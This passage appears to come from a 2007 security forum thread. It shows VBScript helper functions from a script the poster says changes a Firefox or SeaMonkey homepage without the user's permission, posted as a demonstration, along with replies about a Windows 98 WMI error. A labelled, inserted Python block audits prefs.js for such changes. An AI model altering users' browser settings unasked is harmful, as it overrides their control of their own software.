        if fso.FileExists(strFiletoDelete) then
            set f=fso.GetFile(strFiletoDelete)
            f.attributes = 0 
            f.Delete True 
        end if
    End Function
    
    Function GetINI(str_FileName,str_SectionName,str_ItemName, sDefault, iReturn)
      'iReturn : 1 = File not found
      ' 2 = Section not found
      ' 3 = Item not found 
      Dim sTEMP, myFile, strFileName, strSectionName, strItemName
      iReturn=0 
      strFileName=str_FileName
      strSectionName=str_SectionName
      strItemName=str_ItemName
      GetINI = sDefault
    
      strFileName=Trim(strFileName)
      strSectionName=Trim(strSectionName)
      strItemName=Trim(strItemName)
    
      If Left(strSectionName,1) <> "[" Then
        strSectionName="[" + strSectionName
      End If 
    
      If Right(strSectionName,1) <> "]" Then
        strSectionName=strSectionName + "]"
      End If 
    
      If Not fso.fileexists(strFileName) Then
        iReturn = 1
        Exit Function
      End If 
    
      Set MyFile = fso.OpenTextFile(strFileName, ForReading)
      'Detect Empty File
      If myfile.AtEndOfStream Then
        MyFile.Close
        Exit Function 
      End If
      Do
        sTEMP = Trim(MyFile.ReadLine)
        If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
          sTEMP=""
        End If
      Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strSectionName)) = 1) 
    
      If myfile.AtEndOfStream Then
        iReturn = 2
        MyFile.Close
        Exit Function 
      End If 
    
      Do
        sTEMP = Trim(MyFile.ReadLine)
        If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
          sTEMP=""
        End If
        If InStr(UCase(sTEMP),"[") = 1 Then ' Start of next section
          iReturn = 3
          MyFile.Close
          Exit Function 
        End If
      Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strItemName)) = 1) 
    
      MyFile.Close
    
      If (InStr(UCase(sTEMP),UCase(strItemName)) <> 1) Then
        iReturn = 3
        Exit Function 
      End If 
    
      sTEMP=Trim(Right(sTEMP,Len(sTEMP) - (InStr(sTEMP,"="))))
    
      If InStr(sTEMP,";") <> 0 Then ' Check for "on the line" comments
        sTEMP=Trim(Left(sTEMP,InStr(sTEMP,";")-1))
      End If
    
      If sTEMP <> "" Then : GetINI=sTEMP
    End Function 
    
    Function GenerateTempFileName 
        Const TEMPORARY_FOLDER = 2
        Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
        Dim tfolder, tname
        Set tfolder = fso.GetSpecialFolder(TEMPORARY_FOLDER)
        tname = fso.GetTempName 
        GenerateTempFileName = tfolder & "\" & tname 
    End Function 
    
    
    Function WriteIni(strFileName, strSection, strItem, strValue)
      Dim bSectionExists, bInSection, bItemExists, bwrote, strPath, strline, strUcaseLine, iReturn, tfSourceINI, tfDestINI, strWorkingFile, aX, sLeftofEquals
    
      strWorkingFile=GenerateTempFileName
      DeleteFile(strWorkingFile) ' Delete the temporary file if it exists
      bInSection = False
      bSectionExists = False
      GetINI strFileName, strSection, strItem,"",iReturn
      if iReturn = 0 then
        bItemExists = TRUE
      else
        bItemExists = FALSE
      end if
      bwrote = False
      Err.Clear
      Set tfSourceINI = fso.OpenTextFile(strFileName, ForReading, True)
      Set tfDestINI = fso.OpenTextFile(strWorkingFile, ForWriting, True, TRISTATE_FALSE)
      If Err.Number <> 0 Then
        DeleteFile(strWorkingFile) 
        Set tfSourceINI = Nothing
        Set tfDestINI = Nothing
        WriteIni = False
        Exit Function
      End If
      While tfSourceINI.AtEndOfStream = False
        strline = Trim(tfSourceINI.ReadLine)
        strUcaseLine = UCase(strline)
        sLeftofEquals = strUcaseLine 
        if Len(strUcaseLine) > 1 then
          aX = Split(strUcaseLine,"=") ' Split up the string at the "=" 
          sLeftofEquals = Trim(aX(0)) ' Get the left most bit 
        end if
        If bwrote = False Then
          If strUcaseLine = UCase("[" & strSection & "]") Then
            bSectionExists = True
            bInSection = True
          ElseIf InStr(strline, "[") = 1 Then
            bInSection = False
          End If
        End If
    
        If bInSection Then 
          If bItemExists = False Then
            tfDestINI.WriteLine strline
            if len(strValue) => 1 then ' Don't write item out if Value is empty
              tfDestINI.WriteLine strItem & "=" & strValue
            end if 
            bwrote = True
            bInSection = False
          ElseIf sLeftofEquals = UCase(strItem) Then
            if len(strValue) => 1 then ' Don't write item out if Value is empty
              tfDestINI.WriteLine strItem & "=" & strValue
            end if 
            bwrote = True
            bInSection = False
          Else
            tfDestINI.WriteLine strline
          End If
        Else
          tfDestINI.WriteLine strline
        End If
      Wend
      If bSectionExists = False Then ' strSection doesn't exist
        tfDestINI.WriteLine
        tfDestINI.WriteLine "[" & strSection & "]"
        tfDestINI.WriteLine strItem & "=" & strValue
      End If
    
      tfSourceINI.Close
      tfDestINI.Close
      If Err.Number = 0 Then
        fso.DeleteFile strfilename
        fso.CopyFile strWorkingFile , strFilename
        DeleteFile(strWorkingFile)
        WriteIni = True
      Else
        DeleteFile(strWorkingFile)
        WriteIni = False
      End If
      Set tfSourceINI = Nothing
      Set tfDestINI = Nothing
    End Function 
    
    
    • Fixed the previous bug where command line does nothing.
    • If you want to use the command line, save the file and use:
      cscript filename.vbs http://site-to-change-to/
    • If you have your profile elsewhere then I'll have to parse and read registry.dat (in Application Data\Mozilla). I don't think I could do that with VBScript, but you can certainly do that with a real application.
    • Press CANCEL for the application you do not have installed. Otherwise the script will error!


    Please note:
    I am not exposing any vulnerabilities. The only reason the homepage can be changed from user mode is because the user themselves must be able to do that. I'm just using something the application was designed to do. The problem is: I DO NOT HAVE PERMISSION TO DO IT. That is why this is a bad thing.
     
    Last edited: Jul 25, 2007
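
Added example, not part of the thread or of the script above: a small Python check for the kind of change the script makes to prefs.js, answering the earlier point that few products alert when Firefox or SeaMonkey settings change. The sample file contents, the baseline URL and the function name are constructed for illustration; the quoting and trailing-comment checks are heuristics that assume the browser itself writes double-quoted entries with no per-line comments, and that a later entry overrides an earlier one.

```python
import re

# Matches user_pref('key', 'value'); in either quote style, plus any trailing text.
PREF_RE = re.compile(
    r"""^\s*user_pref\(\s*(?P<kq>["'])(?P<key>[^"']+)(?P=kq)\s*,\s*"""
    r"""(?P<vq>["'])(?P<value>.*?)(?P=vq)\s*\)\s*;(?P<tail>.*)$"""
)
HOMEPAGE_KEY = "browser.startup.homepage"


def audit_prefs(text, expected_homepage=None):
    """Return (effective_homepage, findings) for the contents of a prefs.js file."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = PREF_RE.match(line)
        if m and m.group("key") == HOMEPAGE_KEY:
            hits.append((lineno, m))
    findings = []
    if not hits:
        return None, findings
    if len(hits) > 1:
        lines = ", ".join(str(n) for n, _ in hits)
        findings.append(f"homepage set {len(hits)} times (lines {lines}); the last entry wins")
    for lineno, m in hits:
        if m.group("kq") == "'" or m.group("vq") == "'":
            findings.append(f"line {lineno}: single-quoted pref, not the form the browser writes")
        if m.group("tail").strip():
            findings.append(f"line {lineno}: trailing text after the statement: {m.group('tail').strip()!r}")
    effective = hits[-1][1].group("value")
    if expected_homepage is not None and effective != expected_homepage:
        findings.append(f"effective homepage {effective!r} differs from baseline {expected_homepage!r}")
    return effective, findings


# Constructed sample: a browser-written entry followed by an appended one.
SAMPLE = '''# Mozilla User Preferences
user_pref("browser.startup.homepage", "https://intranet.example/");
user_pref("browser.tabs.warnOnClose", false);
user_pref('browser.startup.homepage','http://changed.example/'); // appended
'''

if __name__ == "__main__":
    homepage, problems = audit_prefs(SAMPLE, "https://intranet.example/")
    print("effective:", homepage)
    for p in problems:
        print(" -", p)
```

Run against each profile's prefs.js while the browser is closed, with the baseline taken from a known-good copy of the file.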
  23. herbalist

    herbalist Guest

    The script didn't work on mine.
    script error.gif
    Yes, I'm running 98. It does have several user profiles and uses a non-standard path to the application data folder. When I get time to load a more conventional test image, I'll give the script a try on it.
    Rick
     
  24. herbalist

    herbalist Guest

    I get the same error message on my 98SE testbox with Sea Monkey 1.1.3. It's a single profile unit with everything in the usual places.
    Rick
     
  25. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Line 19 refers to WMI. It appears as if Windows 98 doesn't have WMI installed by default.

    http://www.microsoft.com/downloads/...ba-337b-4e92-8c18-a63847760ea5&DisplayLang=en

    In some ways, not having WMI installed reduces the power of scripting and makes you safer. Platforms after 98 have WMI installed by default.

    If you don't want to install the above, that is fine. I can remove "check if browser is running" so you never have to use WMI. I only use it to check if the browsers are running.

    herbalist, if you press start, run and type in %appdata%

    Do you go to the Application Data folder?

    I looked it up and it doesn't appear to be set as an environment variable in 98. I may have to use a different variable.
     